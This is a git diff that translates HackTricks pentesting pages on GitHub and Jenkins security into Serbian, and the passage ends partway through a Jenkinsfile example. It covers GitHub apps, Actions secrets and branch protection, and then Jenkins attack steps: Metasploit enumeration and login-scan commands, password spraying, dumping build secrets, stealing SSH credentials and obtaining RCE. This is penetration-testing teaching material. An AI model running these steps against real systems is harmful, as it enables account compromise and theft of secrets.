-- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
+- **OAuth aplikacija** bi uvek trebala **delovati kao autentifikovani GitHub korisnik širom celog GitHub-a** (na primer, kada pruža obaveštenja korisnicima) i sa pristupom samo do specificiranih opsega.
+- Oauth aplikacija može se koristiti kao provajder identiteta omogućavanjem "Prijava sa GitHub-om" za autentifikovanog korisnika.
+- **Ne** pravite **OAuth aplikaciju** ako želite da vaša aplikacija deluje na **jednom repozitorijumu**. Sa `repo` Oauth opsegom, Oauth aplikacije mogu **delovati na \_svi\_\*\* repozitorijumima autentifikovanog korisnika\*\*.
+- **Ne** pravite Oauth aplikaciju da deluje kao aplikacija za vaš **tim ili kompaniju**. Oauth aplikacije se autentifikuju kao **jedan korisnik**, tako da ako jedna osoba kreira Oauth aplikaciju za korišćenje u kompaniji, a zatim napusti kompaniju, niko drugi neće imati pristup.
+- **Više** ovde [ovde](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
 
-### Github Applications
+### Github aplikacije
 
-Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
+Github aplikacije mogu tražiti dozvole da **pristupe vašim github informacijama ili da se pretvaraju da ste vi** da bi obavili specifične radnje nad specifičnim resursima. U Github aplikacijama morate navesti repozitorijume kojima će aplikacija imati pristup.
 
-- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
-- The GitHub App should **connect to a personal account or an organisation**.
-- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
-- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
-- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
-- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_
+- Da biste instalirali GitHub aplikaciju, morate biti **vlasnik organizacije ili imati administratorske dozvole** u repozitorijumu.
+- GitHub aplikacija bi trebala **biti povezana sa ličnim nalogom ili organizacijom**.
+- Možete kreirati svoju GitHub aplikaciju na [https://github.com/settings/apps](https://github.com/settings/apps)
+- Možete videti sve **GitHub aplikacije koje imaju pristup vašem nalogu** na [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
+- Ovo su **API krajnje tačke za GitHub aplikacije** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). U zavisnosti od dozvola aplikacije, moći će da pristupi nekima od njih.
+- Možete videti instalirane aplikacije u **organizaciji** na _https://github.com/organizations/\/settings/installations_
 
-Some security recommendations:
+Neke preporuke za bezbednost:
 
-- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
-- Make sure the GitHub App integrates with **specific repositories**.
-- The GitHub App should **connect to a personal account or an organisation**.
-- Don't expect the GitHub App to know and do everything a user can.
-- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
-- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
-- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
+- GitHub aplikacija bi trebala **preduzimati radnje nezavisno od korisnika** (osim ako aplikacija koristi [token za korisnika na serveru](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests)). Da biste održali token za pristup korisnika na serveru sigurnijim, možete koristiti pristupne tokene koji će isteći nakon 8 sati, i osvežavajući token koji se može zameniti za novi pristupni token. Za više informacija, pogledajte "[Osvežavanje tokena za pristup korisnika na serveru](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
+- Uverite se da se GitHub aplikacija integriše sa **specifičnim repozitorijumima**.
+- GitHub aplikacija bi trebala **biti povezana sa ličnim nalogom ili organizacijom**.
+- Ne očekujte da GitHub aplikacija zna i radi sve što korisnik može.
+- **Ne koristite GitHub aplikaciju ako vam je potrebna samo usluga "Prijava sa GitHub-om"**. Ali GitHub aplikacija može koristiti [tok identifikacije korisnika](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) da prijavi korisnike _i_ obavi druge stvari.
+- Ne pravite GitHub aplikaciju ako _samo_ želite da delujete kao GitHub korisnik i radite sve što taj korisnik može.
+- Ako koristite svoju aplikaciju sa GitHub Actions i želite da modifikujete datoteke radnog toka, morate se autentifikovati u ime korisnika sa Oauth tokenom koji uključuje `workflow` opseg. Korisnik mora imati administratorske ili pisane dozvole za repozitorijum koji sadrži datoteku radnog toka. Za više informacija, pogledajte "[Razumevanje opsega za Oauth aplikacije](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
+- **Više** ovde [ovde](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
 
 ### Github Actions
 
-This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
+Ovo **nije način za autentifikaciju na github-u**, ali **maliciozna** Github akcija bi mogla dobiti **neovlašćen pristup github-u** i **u zavisnosti** od **privilegija** datih akciji, moglo bi se izvršiti nekoliko **različitih napada**. Pogledajte u nastavku za više informacija.
 
-## Git Actions
+## Git akcije
 
-Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
+Git akcije omogućavaju automatizaciju **izvršavanja koda kada se dogodi događaj**. Obično je izvršeni kod **neka vrsta povezanosti sa kodom repozitorijuma** (možda izgradnja docker kontejnera ili provera da PR ne sadrži tajne).
 
-### Configuration
+### Konfiguracija
 
-In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
+Na _https://github.com/organizations/\/settings/actions_ moguće je proveriti **konfiguraciju github akcija** za organizaciju.
 
-It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
+Moguće je potpuno zabraniti korišćenje github akcija, **dozvoliti sve github akcije**, ili samo dozvoliti određene akcije.
 
-It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
+Takođe je moguće konfigurisati **ko treba da odobri pokretanje Github akcije** i **dozvole GITHUB_TOKEN** Github akcije kada se pokrene.
 
-### Git Secrets
+### Git tajne
 
-Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
-
-These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
+Github akcije obično trebaju neku vrstu tajni da bi interagovale sa github-om ili aplikacijama trećih strana. Da bi se **izbeglo stavljanje u čistom tekstu** u repozitorijum, github omogućava da se one postave kao **Tajne**.
 
+Ove tajne mogu biti konfigurisane **za repozitorijum ili za celu organizaciju**. Zatim, da bi **Akcija mogla da pristupi tajni**, potrebno je da je deklarisete kao:
 ```yaml
 steps:
-  - name: Hello world action
-    with: # Set the secret as an input
-      super_secret:${{ secrets.SuperSecret }}
-    env: # Or as an environment variable
-      super_secret:${{ secrets.SuperSecret }}
+- name: Hello world action
+with: # Set the secret as an input
+super_secret:${{ secrets.SuperSecret }}
+env: # Or as an environment variable
+super_secret:${{ secrets.SuperSecret }}
 ```
-
-#### Example using Bash 
-
+#### Primer korišćenja Bash 
 ```yaml
 steps:
-  - shell: bash
-    env: SUPER_SECRET:${{ secrets.SuperSecret }}
-    run: |
-      example-command "$SUPER_SECRET"
+- shell: bash
+env: SUPER_SECRET:${{ secrets.SuperSecret }}
+run: |
+example-command "$SUPER_SECRET"
 ```
-
 > [!WARNING]
-> Secrets **can only be accessed from the Github Actions** that have them declared.
+> Tajne informacije **mogu se pristupiti samo iz Github Actions** koje ih imaju deklarisane.
 
-> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
+> Kada se jednom konfigurišu u repozitorijumu ili organizacijama, **korisnici github-a više neće moći da im pristupe**, samo će moći da **promene**.
 
-Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
+Dakle, **jedini način da se ukradu github tajne je da se može pristupiti mašini koja izvršava Github Action** (u toj situaciji ćete moći da pristupite samo tajnama deklarisanim za Action).
 
-### Git Environments
-
-Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
+### Git Okruženja
 
+Github omogućava kreiranje **okruženja** gde možete sačuvati **tajne**. Zatim, možete dati github akciji pristup tajnama unutar okruženja sa nečim poput:
 ```yaml
 jobs:
-  deployment:
-    runs-on: ubuntu-latest
-    environment: env_name
+deployment:
+runs-on: ubuntu-latest
+environment: env_name
 ```
-
-You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\
-It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed.
+Možete konfigurisati okruženje da bude **pristupačno** **svim granama** (podrazumevano), **samo za zaštićene** grane ili **odrediti** koje grane mogu da mu pristupe.\
+Takođe može postaviti **broj potrebnih pregleda** pre **izvršavanja** **akcije** koristeći **okruženje** ili **čekati** neko **vreme** pre nego što dozvoli da se implementacije nastave.
 
 ### Git Action Runner
 
-A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.
+Github akcija može biti **izvršena unutar github okruženja** ili može biti izvršena u **infrastrukturi treće strane** koju je konfigurisao korisnik.
 
-Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**.
+Nekoliko organizacija će dozvoliti pokretanje Github akcija u **infrastrukturi treće strane** jer obično bude **jeftinije**.
 
-You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_
+Možete **navesti self-hosted trkače** organizacije na _https://github.com/organizations/\/settings/actions/runners_
 
-The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml.
+Način da saznate koje **Github akcije se izvršavaju u ne-github infrastrukturi** je da pretražujete `runs-on: self-hosted` u yaml konfiguraciji Github akcije.
 
-It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs.
+**Nije moguće pokrenuti Github akciju organizacije unutar self-hosted okruženja** druge organizacije jer **se generiše jedinstveni token za trkača** prilikom njegove konfiguracije kako bi se znalo kojoj organizaciji trkač pripada.
 
-If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with.
+Ako je prilagođeni **Github trkač konfiguran na mašini unutar AWS-a ili GCP-a**, akcija **može imati pristup metapodacima** i **ukrasti token servisnog naloga** sa kojim mašina radi.
 
 ### Git Action Compromise
 
-If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed.
+Ako su sve akcije (ili zla akcija) dozvoljene, korisnik bi mogao koristiti **Github akciju** koja je **zla** i koja će **kompromitovati** **kontejner** u kojem se izvršava.
 
 > [!CAUTION]
-> A **malicious Github Action** run could be **abused** by the attacker to:
+> **Zla Github akcija** može biti **zloupotrebljena** od strane napadača da:
 >
-> - **Steal all the secrets** the Action has access to
-> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service)
-> - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
+> - **Ukrade sve tajne** kojima akcija ima pristup
+> - **Pomera se lateralno** ako se akcija izvršava unutar **infrastrukture treće strane** gde se može pristupiti SA tokenu koji se koristi za pokretanje mašine (verovatno putem usluge metapodataka)
+> - **Zloupotrebi token** koji koristi **workflow** da **ukrade kod repozitorijuma** gde se akcija izvršava ili **čak da ga izmeni**.
 
 ## Branch Protections
 
-Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
+Zaštite grana su dizajnirane da **ne daju potpunu kontrolu nad repozitorijumom** korisnicima. Cilj je **postaviti nekoliko metoda zaštite pre nego što se može pisati kod unutar neke grane**.
 
-The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_
+**Zaštite grana repozitorijuma** mogu se naći na _https://github.com/\/\/settings/branches_
 
 > [!NOTE]
-> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
+> **Nije moguće postaviti zaštitu grane na nivou organizacije**. Tako da sve one moraju biti deklarisane na svakom repozitorijumu.
 
-Different protections can be applied to a branch (like to master):
+Različite zaštite mogu se primeniti na granu (kao na master):
 
-- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
-  - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
-  - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
-  - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
-  - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
-  - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
-- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
-- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
-- **Require signed commits**. The commits need to be signed.
-- **Require linear history.** Prevent merge commits from being pushed to matching branches.
-- **Include administrators**. If this isn't set, admins can bypass the restrictions.
-- **Restrict who can push to matching branches**. Restrict who can send a PR.
+- Možete **zahtevati PR pre spajanja** (tako da ne možete direktno spojiti kod preko grane). Ako je ovo odabrano, različite druge zaštite mogu biti na snazi:
+- **Zahtevati broj odobrenja**. Veoma je uobičajeno zahtevati 1 ili 2 osobe da odobre vaš PR tako da jedan korisnik ne može direktno spojiti kod.
+- **Odbaciti odobrenja kada su novi commit-i poslati**. Ako ne, korisnik može odobriti legitiman kod, a zatim dodati zli kod i spojiti ga.
+- **Zahtevati preglede od vlasnika koda**. Najmanje 1 vlasnik koda repozitorijuma treba da odobri PR (tako da "slučajni" korisnici ne mogu to odobriti)
+- **Ograničiti ko može odbaciti preglede pull request-a.** Možete odrediti ljude ili timove koji su dozvoljeni da odbace preglede pull request-a.
+- **Dozvoliti određenim akterima da zaobiđu zahteve pull request-a**. Ovi korisnici će moći da zaobiđu prethodne restrikcije.
+- **Zahtevati da status provere prođe pre spajanja.** Neke provere moraju proći pre nego što se može spojiti commit (kao što je github akcija koja proverava da li nema tajni u čistom tekstu).
+- **Zahtevati rešenje razgovora pre spajanja**. Svi komentari na kod moraju biti rešeni pre nego što se PR može spojiti.
+- **Zahtevati potpisane commit-e**. Commit-i moraju biti potpisani.
+- **Zahtevati linearnu istoriju.** Sprečava spajanje commit-a koji se šalju na odgovarajuće grane.
+- **Uključiti administratore**. Ako ovo nije postavljeno, administratori mogu zaobići restrikcije.
+- **Ograničiti ko može slati na odgovarajuće grane**. Ograničiti ko može poslati PR.
 
 > [!NOTE]
-> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
+> Kao što vidite, čak i ako ste uspeli da dobijete neka akreditivna sredstva korisnika, **repozitorijumi mogu biti zaštićeni sprečavajući vas da šaljete kod na master** na primer da kompromitujete CI/CD pipeline.
 
 ## References
 
@@ -253,7 +247,3 @@ Different protections can be applied to a branch (like to master):
 - [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md
index 4dfba3ff3..fd41c920b 100644
--- a/src/pentesting-ci-cd/jenkins-security/README.md
+++ b/src/pentesting-ci-cd/jenkins-security/README.md
@@ -2,84 +2,78 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
+Jenkins je alat koji nudi jednostavan način za uspostavljanje **kontinuirane integracije** ili **kontinuirane isporuke** (CI/CD) okruženja za gotovo **bilo koju** kombinaciju **programskih jezika** i repozitorijuma izvornog koda koristeći pipeline-ove. Pored toga, automatizuje razne rutinske razvojne zadatke. Iako Jenkins ne eliminiše **potrebu za kreiranjem skripti za pojedinačne korake**, pruža brži i robusniji način za integraciju celokupnog niza alata za izgradnju, testiranje i implementaciju nego što se može lako konstruisati ručno.
 
 {{#ref}}
 basic-jenkins-information.md
 {{#endref}}
 
-## Unauthenticated Enumeration
-
-In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
+## Neautorizovana enumeracija
 
+Da biste pretraživali zanimljive Jenkins stranice bez autentifikacije kao što su (_/people_ ili _/asynchPeople_, ovo prikazuje trenutne korisnike) možete koristiti:
 ```
 msf> use auxiliary/scanner/http/jenkins_enum
 ```
-
-Check if you can execute commands without needing authentication:
-
+Proverite da li možete izvršavati komande bez potrebe za autentifikacijom:
 ```
 msf> use auxiliary/scanner/http/jenkins_command
 ```
+Bez kredencijala možete pogledati unutar _**/asynchPeople/**_ putanje ili _**/securityRealm/user/admin/search/index?q=**_ za **korisnička imena**.
 
-Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
-
-You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
+Možda ćete moći da dobijete verziju Jenkins-a iz putanje _**/oops**_ ili _**/error**_
 
 ![](<../../images/image (146).png>)
 
-### Known Vulnerabilities
+### Poznate ranjivosti
 
 {{#ref}}
 https://github.com/gquere/pwn_jenkins
 {{#endref}}
 
-## Login
+## Prijava
 
-In the basic information you can check **all the ways to login inside Jenkins**:
+U osnovnim informacijama možete proveriti **sve načine za prijavu unutar Jenkins-a**:
 
 {{#ref}}
 basic-jenkins-information.md
 {{#endref}}
 
-### Register
+### Registracija
 
-You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
+Moći ćete da pronađete Jenkins instance koje **omogućavaju da kreirate nalog i prijavite se u njega. Tako jednostavno.**
 
-### **SSO Login**
+### **SSO Prijava**
 
-Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
+Takođe, ako su **SSO** **funkcionalnosti**/**pluginovi** prisutni, onda biste trebali pokušati da se **prijavite** u aplikaciju koristeći test nalog (tj. test **Github/Bitbucket nalog**). Trik iz [**ovde**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
 
 ### Bruteforce
 
-**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
-
+**Jenkins** nema **politiku lozinki** i **mitigaciju brute-force napada na korisnička imena**. Bitno je **brute-force** korisnike jer se mogu koristiti **slabe lozinke** ili **korisnička imena kao lozinke**, čak i **obrnuta korisnička imena kao lozinke**.
 ```
 msf> use auxiliary/scanner/http/jenkins_login
 ```
-
 ### Password spraying
 
-Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
+Koristite [ovaj python skript](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) ili [ovaj powershell skript](https://github.com/chryzsh/JenkinsPasswordSpray).
 
 ### IP Whitelisting Bypass
 
-Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
+Mnoge organizacije kombinuju **SaaS-based source control management (SCM) systems** kao što su GitHub ili GitLab sa **internim, samostalno hostovanim CI** rešenjem poput Jenkins-a ili TeamCity-a. Ova postavka omogućava CI sistemima da **prijemaju webhook događaje od SaaS provajdera za kontrolu izvora**, prvenstveno za pokretanje pipeline poslova.
 
-To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
+Da bi to postigle, organizacije **stavljaju na belu listu** **IP opsege** **SCM platformi**, omogućavajući im pristup **internom CI sistemu** putem **webhook-a**. Međutim, važno je napomenuti da **bilo ko** može da kreira **nalog** na GitHub-u ili GitLab-u i konfiguriše ga da **pokrene webhook**, potencijalno šaljući zahteve **internom CI sistemu**.
 
-Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
+Proverite: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
 
 ## Internal Jenkins Abuses
 
-In these scenarios we are going to suppose you have a valid account to access Jenkins.
+U ovim scenarijima pretpostavljamo da imate važeći nalog za pristup Jenkins-u.
 
 > [!WARNING]
-> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
+> U zavisnosti od **Authorization** mehanizma konfiguranog u Jenkins-u i dozvole kompromitovanog korisnika, **možda ćete moći ili ne moći da izvršite sledeće napade.**
 
-For more information check the basic information:
+Za više informacija proverite osnovne informacije:
 
 {{#ref}}
 basic-jenkins-information.md
@@ -87,165 +81,155 @@ basic-jenkins-information.md
 
 ### Listing users
 
-If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
+Ako ste pristupili Jenkins-u, možete da navedete druge registrovane korisnike na [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
 
 ### Dumping builds to find cleartext secrets
 
-Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
-
+Koristite [ovaj skript](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) da izbacite izlaze konzole gradnje i promenljive okruženja gradnje kako biste se nadali da ćete pronaći tajne u čistom tekstu.
 ```bash
 python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
 cd build_dumps
 gitleaks detect --no-git -v
 ```
+### **Krađa SSH kredencijala**
 
-### **Stealing SSH Credentials**
-
-If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
+Ako kompromitovani korisnik ima **dovoljno privilegija da kreira/modifikuje novi Jenkins čvor** i SSH kredencijali su već sačuvani za pristup drugim čvorovima, on bi mogao **ukrasti te kredencijale** kreiranjem/modifikovanjem čvora i **postavljanjem hosta koji će snimati kredencijale** bez verifikacije host ključa:
 
 ![](<../../images/image (218).png>)
 
-You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets).
+Obično ćete pronaći Jenkins ssh kredencijale u **globalnom provajderu** (`/credentials/`), tako da ih možete i dumpovati kao što biste dumpovali bilo koju drugu tajnu. Više informacija u [**odeljku o dumpovanju tajni**](./#dumping-secrets).
 
-### **RCE in Jenkins**
+### **RCE u Jenkins-u**
 
-Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
+Dobijanje **shell-a na Jenkins serveru** daje napadaču priliku da iscuri sve **tajne** i **env varijable** i da **iskoristi druge mašine** smeštene u istoj mreži ili čak **prikupi cloud kredencijale**.
 
-By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
+Podrazumevano, Jenkins će **raditi kao SYSTEM**. Tako da, kompromitovanje će napadaču dati **SYSTEM privilegije**.
 
-### **RCE Creating/Modifying a project**
+### **RCE Kreiranje/Modifikovanje projekta**
 
-Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
+Kreiranje/Modifikovanje projekta je način da se dobije RCE nad Jenkins serverom:
 
 {{#ref}}
 jenkins-rce-creating-modifying-project.md
 {{#endref}}
 
-### **RCE Execute Groovy script**
+### **RCE Izvršavanje Groovy skripte**
 
-You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
+Takođe možete dobiti RCE izvršavanjem Groovy skripte, koja može biti manje uočljiva od kreiranja novog projekta:
 
 {{#ref}}
 jenkins-rce-with-groovy-script.md
 {{#endref}}
 
-### RCE Creating/Modifying Pipeline
+### RCE Kreiranje/Modifikovanje Pipeline-a
 
-You can also get **RCE by creating/modifying a pipeline**:
+Takođe možete dobiti **RCE kreiranjem/modifikovanjem pipeline-a**:
 
 {{#ref}}
 jenkins-rce-creating-modifying-pipeline.md
 {{#endref}}
 
-## Pipeline Exploitation
+## Eksploatacija Pipeline-a
 
-To exploit pipelines you still need to have access to Jenkins.
+Da biste eksploatisali pipeline-ove, još uvek morate imati pristup Jenkins-u.
 
-### Build Pipelines
+### Build Pipeline-i
 
-**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
+**Pipeline-i** se takođe mogu koristiti kao **mehanizam za izgradnju u projektima**, u tom slučaju može se konfigurisati **fajl unutar repozitorijuma** koji će sadržati sintaksu pipeline-a. Podrazumevano se koristi `/Jenkinsfile`:
 
 ![](<../../images/image (127).png>)
 
-It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
+Takođe je moguće **čuvati konfiguracione fajlove pipeline-a na drugim mestima** (na primer, u drugim repozitorijumima) sa ciljem **razdvajanja** pristupa repozitorijumu i pristupa pipeline-u.
 
-If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
-It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not).
+Ako napadač ima **pravo pisanja nad tim fajlom**, moći će da **modifikuje** i **potencijalno pokrene** pipeline bez čak i pristupa Jenkins-u.\
+Moguće je da će napadač morati da **obiđe neke zaštite grana** (u zavisnosti od platforme i privilegija korisnika, one se mogu obići ili ne).
 
-The most common triggers to execute a custom pipeline are:
+Najčešći okidači za izvršavanje prilagođenog pipeline-a su:
 
-- **Pull request** to the main branch (or potentially to other branches)
-- **Push to the main branch** (or potentially to other branches)
-- **Update the main branch** and wait until it's executed somehow
+- **Pull request** na glavnu granu (ili potencijalno na druge grane)
+- **Push na glavnu granu** (ili potencijalno na druge grane)
+- **Ažuriranje glavne grane** i čekanje da se na neki način izvrši
 
 > [!NOTE]
-> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
+> Ako ste **spoljašnji korisnik**, ne biste trebali očekivati da kreirate **PR na glavnu granu** repozitorijuma **drugog korisnika/organizacije** i **pokrenete pipeline**... ali ako je **loše konfiguran**, mogli biste potpuno **kompromitovati kompanije samo eksploatacijom ovoga**.
 
 ### Pipeline RCE
 
-In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline).
+U prethodnom RCE odeljku već je naznačena tehnika za [**dobijanje RCE modifikovanjem pipeline-a**](./#rce-creating-modifying-pipeline).
 
-### Checking Env variables
-
-It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles:
+### Proveravanje Env varijabli
 
+Moguće je deklarisati **env varijable u čistom tekstu** za ceo pipeline ili za specifične faze. Ove env varijable **ne bi trebale sadržati osetljive informacije**, ali napadač uvek može **proveriti sve konfiguracije pipeline-a/Jenkinsfile-ova:**
 ```bash
 pipeline {
-    agent {label 'built-in'}
-    environment {
-        GENERIC_ENV_VAR = "Test pipeline ENV variables."
-    }
+agent {label 'built-in'}
+environment {
